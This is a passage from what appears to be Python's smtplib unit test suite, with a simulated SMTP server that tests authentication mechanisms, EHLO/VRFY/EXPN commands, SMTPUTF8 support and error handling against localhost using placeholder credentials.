expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No db for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No db for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|